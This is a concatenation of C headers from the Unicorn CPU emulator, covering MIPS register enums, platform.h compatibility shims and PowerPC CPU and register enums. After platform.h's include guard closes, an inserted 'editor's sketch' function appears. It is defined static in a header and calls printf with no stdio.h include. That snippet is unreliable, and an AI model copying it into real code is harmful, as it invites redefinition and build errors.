    UC_MIPS_REG_4, UC_MIPS_REG_5, UC_MIPS_REG_6, UC_MIPS_REG_7,
    UC_MIPS_REG_8, UC_MIPS_REG_9, UC_MIPS_REG_10, UC_MIPS_REG_11,
    UC_MIPS_REG_12, UC_MIPS_REG_13, UC_MIPS_REG_14, UC_MIPS_REG_15,
    UC_MIPS_REG_16, UC_MIPS_REG_17, UC_MIPS_REG_18, UC_MIPS_REG_19,
    UC_MIPS_REG_20, UC_MIPS_REG_21, UC_MIPS_REG_22, UC_MIPS_REG_23,
    UC_MIPS_REG_24, UC_MIPS_REG_25, UC_MIPS_REG_26, UC_MIPS_REG_27,
    UC_MIPS_REG_28, UC_MIPS_REG_29, UC_MIPS_REG_30, UC_MIPS_REG_31,

    //> DSP registers
    UC_MIPS_REG_DSPCCOND, UC_MIPS_REG_DSPCARRY, UC_MIPS_REG_DSPEFI,
    UC_MIPS_REG_DSPOUTFLAG, UC_MIPS_REG_DSPOUTFLAG16_19,
    UC_MIPS_REG_DSPOUTFLAG20, UC_MIPS_REG_DSPOUTFLAG21,
    UC_MIPS_REG_DSPOUTFLAG22, UC_MIPS_REG_DSPOUTFLAG23,
    UC_MIPS_REG_DSPPOS, UC_MIPS_REG_DSPSCOUNT,

    //> ACC registers
    UC_MIPS_REG_AC0, UC_MIPS_REG_AC1, UC_MIPS_REG_AC2, UC_MIPS_REG_AC3,

    //> COP registers
    UC_MIPS_REG_CC0, UC_MIPS_REG_CC1, UC_MIPS_REG_CC2, UC_MIPS_REG_CC3,
    UC_MIPS_REG_CC4, UC_MIPS_REG_CC5, UC_MIPS_REG_CC6, UC_MIPS_REG_CC7,

    //> FPU registers
    UC_MIPS_REG_F0, UC_MIPS_REG_F1, UC_MIPS_REG_F2, UC_MIPS_REG_F3,
    UC_MIPS_REG_F4, UC_MIPS_REG_F5, UC_MIPS_REG_F6, UC_MIPS_REG_F7,
    UC_MIPS_REG_F8, UC_MIPS_REG_F9, UC_MIPS_REG_F10, UC_MIPS_REG_F11,
    UC_MIPS_REG_F12, UC_MIPS_REG_F13, UC_MIPS_REG_F14, UC_MIPS_REG_F15,
    UC_MIPS_REG_F16, UC_MIPS_REG_F17, UC_MIPS_REG_F18, UC_MIPS_REG_F19,
    UC_MIPS_REG_F20, UC_MIPS_REG_F21, UC_MIPS_REG_F22, UC_MIPS_REG_F23,
    UC_MIPS_REG_F24, UC_MIPS_REG_F25, UC_MIPS_REG_F26, UC_MIPS_REG_F27,
    UC_MIPS_REG_F28, UC_MIPS_REG_F29, UC_MIPS_REG_F30, UC_MIPS_REG_F31,
    UC_MIPS_REG_FCC0, UC_MIPS_REG_FCC1, UC_MIPS_REG_FCC2, UC_MIPS_REG_FCC3,
    UC_MIPS_REG_FCC4, UC_MIPS_REG_FCC5, UC_MIPS_REG_FCC6, UC_MIPS_REG_FCC7,

    //> AFPR128
    UC_MIPS_REG_W0, UC_MIPS_REG_W1, UC_MIPS_REG_W2, UC_MIPS_REG_W3,
    UC_MIPS_REG_W4, UC_MIPS_REG_W5, UC_MIPS_REG_W6, UC_MIPS_REG_W7,
    UC_MIPS_REG_W8, UC_MIPS_REG_W9, UC_MIPS_REG_W10, UC_MIPS_REG_W11,
    UC_MIPS_REG_W12, UC_MIPS_REG_W13, UC_MIPS_REG_W14, UC_MIPS_REG_W15,
    UC_MIPS_REG_W16, UC_MIPS_REG_W17, UC_MIPS_REG_W18, UC_MIPS_REG_W19,
    UC_MIPS_REG_W20, UC_MIPS_REG_W21, UC_MIPS_REG_W22, UC_MIPS_REG_W23,
    UC_MIPS_REG_W24, UC_MIPS_REG_W25, UC_MIPS_REG_W26, UC_MIPS_REG_W27,
    UC_MIPS_REG_W28, UC_MIPS_REG_W29, UC_MIPS_REG_W30, UC_MIPS_REG_W31,

    UC_MIPS_REG_HI, UC_MIPS_REG_LO,
    UC_MIPS_REG_P0, UC_MIPS_REG_P1,
    UC_MIPS_REG_P2,
    UC_MIPS_REG_MPL0, UC_MIPS_REG_MPL1, UC_MIPS_REG_MPL2,
    UC_MIPS_REG_CP0_CONFIG3, UC_MIPS_REG_CP0_USERLOCAL,
    UC_MIPS_REG_CP0_STATUS,

    UC_MIPS_REG_ENDING, // <-- mark the end of the list of registers

    // alias registers
    UC_MIPS_REG_ZERO = UC_MIPS_REG_0,
    UC_MIPS_REG_AT = UC_MIPS_REG_1,
    UC_MIPS_REG_V0 = UC_MIPS_REG_2,
    UC_MIPS_REG_V1 = UC_MIPS_REG_3,
    UC_MIPS_REG_A0 = UC_MIPS_REG_4,
    UC_MIPS_REG_A1 = UC_MIPS_REG_5,
    UC_MIPS_REG_A2 = UC_MIPS_REG_6,
    UC_MIPS_REG_A3 = UC_MIPS_REG_7,
    UC_MIPS_REG_T0 = UC_MIPS_REG_8,
    UC_MIPS_REG_T1 = UC_MIPS_REG_9,
    UC_MIPS_REG_T2 = UC_MIPS_REG_10,
    UC_MIPS_REG_T3 = UC_MIPS_REG_11,
    UC_MIPS_REG_T4 = UC_MIPS_REG_12,
    UC_MIPS_REG_T5 = UC_MIPS_REG_13,
    UC_MIPS_REG_T6 = UC_MIPS_REG_14,
    UC_MIPS_REG_T7 = UC_MIPS_REG_15,
    UC_MIPS_REG_S0 = UC_MIPS_REG_16,
    UC_MIPS_REG_S1 = UC_MIPS_REG_17,
    UC_MIPS_REG_S2 = UC_MIPS_REG_18,
    UC_MIPS_REG_S3 = UC_MIPS_REG_19,
    UC_MIPS_REG_S4 = UC_MIPS_REG_20,
    UC_MIPS_REG_S5 = UC_MIPS_REG_21,
    UC_MIPS_REG_S6 = UC_MIPS_REG_22,
    UC_MIPS_REG_S7 = UC_MIPS_REG_23,
    UC_MIPS_REG_T8 = UC_MIPS_REG_24,
    UC_MIPS_REG_T9 = UC_MIPS_REG_25,
    UC_MIPS_REG_K0 = UC_MIPS_REG_26,
    UC_MIPS_REG_K1 = UC_MIPS_REG_27,
    UC_MIPS_REG_GP = UC_MIPS_REG_28,
    UC_MIPS_REG_SP = UC_MIPS_REG_29,
    UC_MIPS_REG_FP = UC_MIPS_REG_30,
    UC_MIPS_REG_S8 = UC_MIPS_REG_30,
    UC_MIPS_REG_RA = UC_MIPS_REG_31,
    UC_MIPS_REG_HI0 = UC_MIPS_REG_AC0,
    UC_MIPS_REG_HI1 = UC_MIPS_REG_AC1,
    UC_MIPS_REG_HI2 = UC_MIPS_REG_AC2,
    UC_MIPS_REG_HI3 = UC_MIPS_REG_AC3,
    UC_MIPS_REG_LO0 = UC_MIPS_REG_HI0,
    UC_MIPS_REG_LO1 = UC_MIPS_REG_HI1,
    UC_MIPS_REG_LO2 = UC_MIPS_REG_HI2,
    UC_MIPS_REG_LO3 = UC_MIPS_REG_HI3,
} UC_MIPS_REG;

#ifdef __cplusplus
}
#endif

#endif

unicorn-2.1.1/include/unicorn/platform.h

/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */

/* This file is to support header files that are missing in MSVC and
   other non-standard compilers. */
#ifndef UNICORN_PLATFORM_H
#define UNICORN_PLATFORM_H

/*
These are the various MSVC versions as given by _MSC_VER:
MSVC++ 14.0 _MSC_VER == 1900 (Visual Studio 2015)
MSVC++ 12.0 _MSC_VER == 1800 (Visual Studio 2013)
MSVC++ 11.0 _MSC_VER == 1700 (Visual Studio 2012)
MSVC++ 10.0 _MSC_VER == 1600 (Visual Studio 2010)
MSVC++ 9.0  _MSC_VER == 1500 (Visual Studio 2008)
MSVC++ 8.0  _MSC_VER == 1400 (Visual Studio 2005)
MSVC++ 7.1  _MSC_VER == 1310 (Visual Studio 2003)
MSVC++ 7.0  _MSC_VER == 1300
MSVC++ 6.0  _MSC_VER == 1200
MSVC++ 5.0  _MSC_VER == 1100
*/
#define MSC_VER_VS2003 1310
#define MSC_VER_VS2005 1400
#define MSC_VER_VS2008 1500
#define MSC_VER_VS2010 1600
#define MSC_VER_VS2012 1700
#define MSC_VER_VS2013 1800
#define MSC_VER_VS2015 1900

// handle stdbool.h compatibility
#if !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__) && \
    (defined(WIN32) || defined(WIN64) || defined(_WIN32) || defined(_WIN64))
// MSVC

// stdbool.h
#if (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE)
// this system does not have stdbool.h
#ifndef __cplusplus
typedef unsigned char bool;
#define false 0
#define true 1
#endif // __cplusplus

#else
// VisualStudio 2013+ -> C99 is supported
#include <stdbool.h>
#endif // (_MSC_VER < MSC_VER_VS2013) || defined(_KERNEL_MODE)

#else
// not MSVC -> C99 is supported
#include <stdbool.h>
#endif // !defined(__CYGWIN__) && !defined(__MINGW32__) && !defined(__MINGW64__)
       // && (defined (WIN32) || defined (WIN64) || defined (_WIN32) || defined
       // (_WIN64))

#if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) || defined(_KERNEL_MODE)
// this system does not have stdint.h
typedef signed char int8_t;
typedef signed short int16_t;
typedef signed int int32_t;
typedef unsigned char uint8_t;
typedef unsigned short uint16_t;
typedef unsigned int uint32_t;
typedef signed long long int64_t;
typedef unsigned long long uint64_t;
typedef signed char int_fast8_t;
typedef int int_fast16_t;
typedef int int_fast32_t;
typedef long long int_fast64_t;
typedef unsigned char uint_fast8_t;
typedef unsigned int uint_fast16_t;
typedef unsigned int uint_fast32_t;
typedef unsigned long long uint_fast64_t;

#if !defined(_W64)
#if !defined(__midl) && (defined(_X86_) || defined(_M_IX86)) &&                \
    _MSC_VER >= 1300
#define _W64 __w64
#else
#define _W64
#endif
#endif

#ifndef _INTPTR_T_DEFINED
#define _INTPTR_T_DEFINED
#ifdef _WIN64
typedef long long intptr_t;
#else /* _WIN64 */
typedef _W64 int intptr_t;
#endif /* _WIN64 */
#endif /* _INTPTR_T_DEFINED */

#ifndef _UINTPTR_T_DEFINED
#define _UINTPTR_T_DEFINED
#ifdef _WIN64
typedef unsigned long long uintptr_t;
#else /* _WIN64 */
typedef _W64 unsigned int uintptr_t;
#endif /* _WIN64 */
#endif /* _UINTPTR_T_DEFINED */

#define INT8_MIN (-127i8 - 1)
#define INT16_MIN (-32767i16 - 1)
#define INT32_MIN (-2147483647i32 - 1)
#define INT64_MIN (-9223372036854775807i64 - 1)
#define INT8_MAX 127i8
#define INT16_MAX 32767i16
#define INT32_MAX 2147483647i32
#define INT64_MAX 9223372036854775807i64
#define UINT8_MAX 0xffui8
#define UINT16_MAX 0xffffui16
#define UINT32_MAX 0xffffffffui32
#define UINT64_MAX 0xffffffffffffffffui64
#define INT_FAST8_MIN INT8_MIN
#define INT_FAST16_MIN INT32_MIN
#define INT_FAST32_MIN INT32_MIN
#define INT_FAST64_MIN INT64_MIN
#define INT_FAST8_MAX INT8_MAX
#define INT_FAST16_MAX INT32_MAX
#define INT_FAST32_MAX INT32_MAX
#define INT_FAST64_MAX INT64_MAX
#define UINT_FAST8_MAX UINT8_MAX
#define UINT_FAST16_MAX UINT32_MAX
#define UINT_FAST32_MAX UINT32_MAX
#define UINT_FAST64_MAX UINT64_MAX

#ifdef _WIN64
#define INTPTR_MIN INT64_MIN
#define INTPTR_MAX INT64_MAX
#define UINTPTR_MAX UINT64_MAX
#else /* _WIN64 */
#define INTPTR_MIN INT32_MIN
#define INTPTR_MAX INT32_MAX
#define UINTPTR_MAX UINT32_MAX
#endif /* _WIN64 */

#else
// this system has stdint.h
#if defined(_MSC_VER) && (_MSC_VER == MSC_VER_VS2010)
#define _INTPTR 2
#endif
#include <stdint.h>
#endif // (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2010)) ||
       // defined(_KERNEL_MODE)

// handle inttypes.h compatibility
#if (defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013)) || defined(_KERNEL_MODE)
// this system does not have inttypes.h

#define __PRI_8_LENGTH_MODIFIER__ "hh"
#define __PRI_64_LENGTH_MODIFIER__ "ll"

#define PRId8 __PRI_8_LENGTH_MODIFIER__ "d"
#define PRIi8 __PRI_8_LENGTH_MODIFIER__ "i"
#define PRIo8 __PRI_8_LENGTH_MODIFIER__ "o"
#define PRIu8 __PRI_8_LENGTH_MODIFIER__ "u"
#define PRIx8 __PRI_8_LENGTH_MODIFIER__ "x"
#define PRIX8 __PRI_8_LENGTH_MODIFIER__ "X"

#define PRId16 "hd"
#define PRIi16 "hi"
#define PRIo16 "ho"
#define PRIu16 "hu"
#define PRIx16 "hx"
#define PRIX16 "hX"

#if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012)
#define PRId32 "ld"
#define PRIi32 "li"
#define PRIo32 "lo"
#define PRIu32 "lu"
#define PRIx32 "lx"
#define PRIX32 "lX"
#else
// OSX
#define PRId32 "d"
#define PRIi32 "i"
#define PRIo32 "o"
#define PRIu32 "u"
#define PRIx32 "x"
#define PRIX32 "X"
#endif // defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012)

#if defined(_MSC_VER) && (_MSC_VER <= MSC_VER_VS2012)
// redefine functions from inttypes.h used in cstool
#define strtoull _strtoui64
#endif

#define PRId64 __PRI_64_LENGTH_MODIFIER__ "d"
#define PRIi64 __PRI_64_LENGTH_MODIFIER__ "i"
#define PRIo64 __PRI_64_LENGTH_MODIFIER__ "o"
#define PRIu64 __PRI_64_LENGTH_MODIFIER__ "u"
#define PRIx64 __PRI_64_LENGTH_MODIFIER__ "x"
#define PRIX64 __PRI_64_LENGTH_MODIFIER__ "X"

#else
// this system has inttypes.h by default
#include <inttypes.h>
#endif // #if defined(_MSC_VER) && (_MSC_VER < MSC_VER_VS2013) ||
       // defined(_KERNEL_MODE)

// sys/time.h compatibility
#if defined(_MSC_VER)
#include <sys/types.h>
#include <sys/timeb.h>
#include <windows.h>
#else
#include <sys/time.h>
#endif

// unistd.h compatibility
#if defined(_MSC_VER)

static int usleep(uint32_t usec)
{
    HANDLE timer;
    LARGE_INTEGER due;

    timer = CreateWaitableTimer(NULL, TRUE, NULL);
    if (!timer)
        return -1;

    due.QuadPart = (-((int64_t)usec)) * 10LL;
    if (!SetWaitableTimer(timer, &due, 0, NULL, NULL, 0)) {
        CloseHandle(timer);
        return -1;
    }
    WaitForSingleObject(timer, INFINITE);
    CloseHandle(timer);
    return 0;
}

#else
#include <unistd.h>
#endif

// misc support
#if defined(_MSC_VER)
#ifdef _WIN64
typedef signed __int64 ssize_t;
#else
typedef _W64 signed int ssize_t;
#endif

#ifndef va_copy
#define va_copy(d, s) ((d) = (s))
#endif
#define strcasecmp _stricmp
#if (_MSC_VER < MSC_VER_VS2015)
#define snprintf _snprintf
#endif
#if (_MSC_VER <= MSC_VER_VS2013)
#define strtoll _strtoi64
#endif
#endif

#endif // UNICORN_PLATFORM_H
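/* Example (editor's sketch): what the compatibility layer above buys us --
 * fixed-width printf specifiers and usleep() that work the same under MSVC
 * and POSIX toolchains. */
static void print_addr_demo(uint64_t address, uint32_t size)
{
    // PRIx64/PRIu32 expand to the right length modifier per toolchain.
    printf("mapping 0x%" PRIx64 " (%" PRIu32 " bytes)\n", address, size);
    usleep(1000); // resolved by the shim above on MSVC, by unistd.h elsewhere
}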
unicorn-2.1.1/include/unicorn/ppc.h

/* Unicorn Engine */
/* By Nguyen Anh Quynh <aquynh@gmail.com>, 2015-2017 */
/* This file is released under LGPL2.
   See COPYING.LGPL2 in root directory for more details */

#ifndef UNICORN_PPC_H
#define UNICORN_PPC_H

#ifdef __cplusplus
extern "C" {
#endif

#ifdef _MSC_VER
#pragma warning(disable : 4201)
#endif

//> PPC CPU
typedef enum uc_cpu_ppc {
    UC_CPU_PPC32_401 = 0,
    UC_CPU_PPC32_401A1, UC_CPU_PPC32_401B2, UC_CPU_PPC32_401C2,
    UC_CPU_PPC32_401D2, UC_CPU_PPC32_401E2, UC_CPU_PPC32_401F2,
    UC_CPU_PPC32_401G2, UC_CPU_PPC32_IOP480, UC_CPU_PPC32_COBRA,
    UC_CPU_PPC32_403GA, UC_CPU_PPC32_403GB, UC_CPU_PPC32_403GC,
    UC_CPU_PPC32_403GCX, UC_CPU_PPC32_405D2, UC_CPU_PPC32_405D4,
    UC_CPU_PPC32_405CRA, UC_CPU_PPC32_405CRB, UC_CPU_PPC32_405CRC,
    UC_CPU_PPC32_405EP, UC_CPU_PPC32_405EZ, UC_CPU_PPC32_405GPA,
    UC_CPU_PPC32_405GPB, UC_CPU_PPC32_405GPC, UC_CPU_PPC32_405GPD,
    UC_CPU_PPC32_405GPR, UC_CPU_PPC32_405LP, UC_CPU_PPC32_NPE405H,
    UC_CPU_PPC32_NPE405H2, UC_CPU_PPC32_NPE405L, UC_CPU_PPC32_NPE4GS3,
    UC_CPU_PPC32_STB03, UC_CPU_PPC32_STB04, UC_CPU_PPC32_STB25,
    UC_CPU_PPC32_X2VP4, UC_CPU_PPC32_X2VP20,
    UC_CPU_PPC32_440_XILINX, UC_CPU_PPC32_440_XILINX_W_DFPU,
    UC_CPU_PPC32_440EPA, UC_CPU_PPC32_440EPB, UC_CPU_PPC32_440EPX,
    UC_CPU_PPC32_460EXB,
    UC_CPU_PPC32_G2, UC_CPU_PPC32_G2H4, UC_CPU_PPC32_G2GP,
    UC_CPU_PPC32_G2LS, UC_CPU_PPC32_G2HIP3, UC_CPU_PPC32_G2HIP4,
    UC_CPU_PPC32_MPC603, UC_CPU_PPC32_G2LE, UC_CPU_PPC32_G2LEGP,
    UC_CPU_PPC32_G2LELS, UC_CPU_PPC32_G2LEGP1, UC_CPU_PPC32_G2LEGP3,
    UC_CPU_PPC32_MPC5200_V10, UC_CPU_PPC32_MPC5200_V11,
    UC_CPU_PPC32_MPC5200_V12, UC_CPU_PPC32_MPC5200B_V20,
    UC_CPU_PPC32_MPC5200B_V21,
    UC_CPU_PPC32_E200Z5, UC_CPU_PPC32_E200Z6,
    UC_CPU_PPC32_E300C1, UC_CPU_PPC32_E300C2, UC_CPU_PPC32_E300C3,
    UC_CPU_PPC32_E300C4,
    UC_CPU_PPC32_MPC8343, UC_CPU_PPC32_MPC8343A, UC_CPU_PPC32_MPC8343E,
    UC_CPU_PPC32_MPC8343EA, UC_CPU_PPC32_MPC8347T, UC_CPU_PPC32_MPC8347P,
    UC_CPU_PPC32_MPC8347AT, UC_CPU_PPC32_MPC8347AP, UC_CPU_PPC32_MPC8347ET,
    UC_CPU_PPC32_MPC8347EP, UC_CPU_PPC32_MPC8347EAT, UC_CPU_PPC32_MPC8347EAP,
    UC_CPU_PPC32_MPC8349, UC_CPU_PPC32_MPC8349A, UC_CPU_PPC32_MPC8349E,
    UC_CPU_PPC32_MPC8349EA, UC_CPU_PPC32_MPC8377, UC_CPU_PPC32_MPC8377E,
    UC_CPU_PPC32_MPC8378, UC_CPU_PPC32_MPC8378E, UC_CPU_PPC32_MPC8379,
    UC_CPU_PPC32_MPC8379E,
    UC_CPU_PPC32_E500_V10, UC_CPU_PPC32_E500_V20, UC_CPU_PPC32_E500V2_V10,
    UC_CPU_PPC32_E500V2_V20, UC_CPU_PPC32_E500V2_V21, UC_CPU_PPC32_E500V2_V22,
    UC_CPU_PPC32_E500V2_V30, UC_CPU_PPC32_E500MC,
    UC_CPU_PPC32_MPC8533_V10, UC_CPU_PPC32_MPC8533_V11,
    UC_CPU_PPC32_MPC8533E_V10, UC_CPU_PPC32_MPC8533E_V11,
    UC_CPU_PPC32_MPC8540_V10, UC_CPU_PPC32_MPC8540_V20,
    UC_CPU_PPC32_MPC8540_V21, UC_CPU_PPC32_MPC8541_V10,
    UC_CPU_PPC32_MPC8541_V11,
    UC_CPU_PPC32_MPC8541E_V10, UC_CPU_PPC32_MPC8541E_V11,
    UC_CPU_PPC32_MPC8543_V10, UC_CPU_PPC32_MPC8543_V11,
    UC_CPU_PPC32_MPC8543_V20, UC_CPU_PPC32_MPC8543_V21,
    UC_CPU_PPC32_MPC8543E_V10, UC_CPU_PPC32_MPC8543E_V11,
    UC_CPU_PPC32_MPC8543E_V20, UC_CPU_PPC32_MPC8543E_V21,
    UC_CPU_PPC32_MPC8544_V10, UC_CPU_PPC32_MPC8544_V11,
    UC_CPU_PPC32_MPC8544E_V10, UC_CPU_PPC32_MPC8544E_V11,
    UC_CPU_PPC32_MPC8545_V20, UC_CPU_PPC32_MPC8545_V21,
    UC_CPU_PPC32_MPC8545E_V20, UC_CPU_PPC32_MPC8545E_V21,
    UC_CPU_PPC32_MPC8547E_V20, UC_CPU_PPC32_MPC8547E_V21,
    UC_CPU_PPC32_MPC8548_V10, UC_CPU_PPC32_MPC8548_V11,
    UC_CPU_PPC32_MPC8548_V20, UC_CPU_PPC32_MPC8548_V21,
    UC_CPU_PPC32_MPC8548E_V10, UC_CPU_PPC32_MPC8548E_V11,
    UC_CPU_PPC32_MPC8548E_V20, UC_CPU_PPC32_MPC8548E_V21,
    UC_CPU_PPC32_MPC8555_V10, UC_CPU_PPC32_MPC8555_V11,
    UC_CPU_PPC32_MPC8555E_V10, UC_CPU_PPC32_MPC8555E_V11,
    UC_CPU_PPC32_MPC8560_V10, UC_CPU_PPC32_MPC8560_V20,
    UC_CPU_PPC32_MPC8560_V21, UC_CPU_PPC32_MPC8567, UC_CPU_PPC32_MPC8567E,
    UC_CPU_PPC32_MPC8568, UC_CPU_PPC32_MPC8568E, UC_CPU_PPC32_MPC8572,
    UC_CPU_PPC32_MPC8572E,
    UC_CPU_PPC32_E600, UC_CPU_PPC32_MPC8610, UC_CPU_PPC32_MPC8641,
    UC_CPU_PPC32_MPC8641D,
    UC_CPU_PPC32_601_V0, UC_CPU_PPC32_601_V1, UC_CPU_PPC32_601_V2,
    UC_CPU_PPC32_602, UC_CPU_PPC32_603,
    UC_CPU_PPC32_603E_V1_1, UC_CPU_PPC32_603E_V1_2, UC_CPU_PPC32_603E_V1_3,
    UC_CPU_PPC32_603E_V1_4, UC_CPU_PPC32_603E_V2_2, UC_CPU_PPC32_603E_V3,
    UC_CPU_PPC32_603E_V4, UC_CPU_PPC32_603E_V4_1, UC_CPU_PPC32_603E7,
    UC_CPU_PPC32_603E7T, UC_CPU_PPC32_603E7V, UC_CPU_PPC32_603E7V1,
    UC_CPU_PPC32_603E7V2, UC_CPU_PPC32_603P,
    UC_CPU_PPC32_604, UC_CPU_PPC32_604E_V1_0, UC_CPU_PPC32_604E_V2_2,
    UC_CPU_PPC32_604E_V2_4, UC_CPU_PPC32_604R,
    UC_CPU_PPC32_740_V1_0, UC_CPU_PPC32_750_V1_0, UC_CPU_PPC32_740_V2_0,
    UC_CPU_PPC32_750_V2_0, UC_CPU_PPC32_740_V2_1, UC_CPU_PPC32_750_V2_1,
    UC_CPU_PPC32_740_V2_2, UC_CPU_PPC32_750_V2_2, UC_CPU_PPC32_740_V3_0,
    UC_CPU_PPC32_750_V3_0, UC_CPU_PPC32_740_V3_1, UC_CPU_PPC32_750_V3_1,
    UC_CPU_PPC32_740E, UC_CPU_PPC32_750E, UC_CPU_PPC32_740P,
    UC_CPU_PPC32_750P,
    UC_CPU_PPC32_750CL_V1_0, UC_CPU_PPC32_750CL_V2_0,
    UC_CPU_PPC32_750CX_V1_0, UC_CPU_PPC32_750CX_V2_0,
    UC_CPU_PPC32_750CX_V2_1, UC_CPU_PPC32_750CX_V2_2,
    UC_CPU_PPC32_750CXE_V2_1, UC_CPU_PPC32_750CXE_V2_2,
    UC_CPU_PPC32_750CXE_V2_3, UC_CPU_PPC32_750CXE_V2_4,
    UC_CPU_PPC32_750CXE_V2_4B, UC_CPU_PPC32_750CXE_V3_0,
    UC_CPU_PPC32_750CXE_V3_1, UC_CPU_PPC32_750CXE_V3_1B,
    UC_CPU_PPC32_750CXR, UC_CPU_PPC32_750FL,
    UC_CPU_PPC32_750FX_V1_0, UC_CPU_PPC32_750FX_V2_0,
    UC_CPU_PPC32_750FX_V2_1, UC_CPU_PPC32_750FX_V2_2,
    UC_CPU_PPC32_750FX_V2_3, UC_CPU_PPC32_750GL,
    UC_CPU_PPC32_750GX_V1_0, UC_CPU_PPC32_750GX_V1_1,
    UC_CPU_PPC32_750GX_V1_2,
    UC_CPU_PPC32_750L_V2_0, UC_CPU_PPC32_750L_V2_1, UC_CPU_PPC32_750L_V2_2,
    UC_CPU_PPC32_750L_V3_0, UC_CPU_PPC32_750L_V3_2,
    UC_CPU_PPC32_745_V1_0, UC_CPU_PPC32_755_V1_0, UC_CPU_PPC32_745_V1_1,
    UC_CPU_PPC32_755_V1_1, UC_CPU_PPC32_745_V2_0, UC_CPU_PPC32_755_V2_0,
    UC_CPU_PPC32_745_V2_1, UC_CPU_PPC32_755_V2_1, UC_CPU_PPC32_745_V2_2,
    UC_CPU_PPC32_755_V2_2, UC_CPU_PPC32_745_V2_3, UC_CPU_PPC32_755_V2_3,
    UC_CPU_PPC32_745_V2_4, UC_CPU_PPC32_755_V2_4, UC_CPU_PPC32_745_V2_5,
    UC_CPU_PPC32_755_V2_5, UC_CPU_PPC32_745_V2_6, UC_CPU_PPC32_755_V2_6,
    UC_CPU_PPC32_745_V2_7, UC_CPU_PPC32_755_V2_7, UC_CPU_PPC32_745_V2_8,
    UC_CPU_PPC32_755_V2_8,
    UC_CPU_PPC32_7400_V1_0, UC_CPU_PPC32_7400_V1_1, UC_CPU_PPC32_7400_V2_0,
    UC_CPU_PPC32_7400_V2_1, UC_CPU_PPC32_7400_V2_2, UC_CPU_PPC32_7400_V2_6,
    UC_CPU_PPC32_7400_V2_7, UC_CPU_PPC32_7400_V2_8, UC_CPU_PPC32_7400_V2_9,
    UC_CPU_PPC32_7410_V1_0, UC_CPU_PPC32_7410_V1_1,
    UC_CPU_PPC32_7410_V1_2, UC_CPU_PPC32_7410_V1_3, UC_CPU_PPC32_7410_V1_4,
    UC_CPU_PPC32_7448_V1_0, UC_CPU_PPC32_7448_V1_1, UC_CPU_PPC32_7448_V2_0,
    UC_CPU_PPC32_7448_V2_1,
    UC_CPU_PPC32_7450_V1_0, UC_CPU_PPC32_7450_V1_1, UC_CPU_PPC32_7450_V1_2,
    UC_CPU_PPC32_7450_V2_0, UC_CPU_PPC32_7450_V2_1,
    UC_CPU_PPC32_7441_V2_1, UC_CPU_PPC32_7441_V2_3, UC_CPU_PPC32_7451_V2_3,
    UC_CPU_PPC32_7441_V2_10, UC_CPU_PPC32_7451_V2_10,
    UC_CPU_PPC32_7445_V1_0, UC_CPU_PPC32_7455_V1_0, UC_CPU_PPC32_7445_V2_1,
    UC_CPU_PPC32_7455_V2_1, UC_CPU_PPC32_7445_V3_2, UC_CPU_PPC32_7455_V3_2,
    UC_CPU_PPC32_7445_V3_3, UC_CPU_PPC32_7455_V3_3, UC_CPU_PPC32_7445_V3_4,
    UC_CPU_PPC32_7455_V3_4,
    UC_CPU_PPC32_7447_V1_0, UC_CPU_PPC32_7457_V1_0, UC_CPU_PPC32_7447_V1_1,
    UC_CPU_PPC32_7457_V1_1, UC_CPU_PPC32_7457_V1_2,
    UC_CPU_PPC32_7447A_V1_0, UC_CPU_PPC32_7457A_V1_0,
    UC_CPU_PPC32_7447A_V1_1, UC_CPU_PPC32_7457A_V1_1,
    UC_CPU_PPC32_7447A_V1_2, UC_CPU_PPC32_7457A_V1_2,
    UC_CPU_PPC32_ENDING
} uc_cpu_ppc;

//> PPC64 CPU
typedef enum uc_cpu_ppc64 {
    UC_CPU_PPC64_E5500 = 0,
    UC_CPU_PPC64_E6500,
    UC_CPU_PPC64_970_V2_2,
    UC_CPU_PPC64_970FX_V1_0, UC_CPU_PPC64_970FX_V2_0,
    UC_CPU_PPC64_970FX_V2_1, UC_CPU_PPC64_970FX_V3_0,
    UC_CPU_PPC64_970FX_V3_1,
    UC_CPU_PPC64_970MP_V1_0, UC_CPU_PPC64_970MP_V1_1,
    UC_CPU_PPC64_POWER5_V2_1,
    UC_CPU_PPC64_POWER7_V2_3, UC_CPU_PPC64_POWER7_V2_1,
    UC_CPU_PPC64_POWER8E_V2_1, UC_CPU_PPC64_POWER8_V2_0,
    UC_CPU_PPC64_POWER8NVL_V1_0,
    UC_CPU_PPC64_POWER9_V1_0, UC_CPU_PPC64_POWER9_V2_0,
    UC_CPU_PPC64_POWER10_V1_0,
    UC_CPU_PPC64_ENDING
} uc_cpu_ppc64;

//> PPC registers
typedef enum uc_ppc_reg {
    UC_PPC_REG_INVALID = 0,

    //> General purpose registers
    UC_PPC_REG_PC,
    UC_PPC_REG_0, UC_PPC_REG_1, UC_PPC_REG_2, UC_PPC_REG_3,
    UC_PPC_REG_4, UC_PPC_REG_5, UC_PPC_REG_6, UC_PPC_REG_7,
    UC_PPC_REG_8, UC_PPC_REG_9, UC_PPC_REG_10, UC_PPC_REG_11,
    UC_PPC_REG_12, UC_PPC_REG_13, UC_PPC_REG_14, UC_PPC_REG_15,
    UC_PPC_REG_16, UC_PPC_REG_17, UC_PPC_REG_18, UC_PPC_REG_19,
    UC_PPC_REG_20, UC_PPC_REG_21, UC_PPC_REG_22, UC_PPC_REG_23,
    UC_PPC_REG_24, UC_PPC_REG_25, UC_PPC_REG_26, UC_PPC_REG_27,
    UC_PPC_REG_28, UC_PPC_REG_29, UC_PPC_REG_30, UC_PPC_REG_31,
    UC_PPC_REG_CR0, UC_PPC_REG_CR1, UC_PPC_REG_CR2, UC_PPC_REG_CR3,
    UC_PPC_REG_CR4, UC_PPC_REG_CR5, UC_PPC_REG_CR6, UC_PPC_REG_CR7,
    UC_PPC_REG_FPR0, UC_PPC_REG_FPR1, UC_PPC_REG_FPR2, UC_PPC_REG_FPR3,
    UC_PPC_REG_FPR4, UC_PPC_REG_FPR5, UC_PPC_REG_FPR6, UC_PPC_REG_FPR7,
    UC_PPC_REG_FPR8, UC_PPC_REG_FPR9, UC_PPC_REG_FPR10, UC_PPC_REG_FPR11,
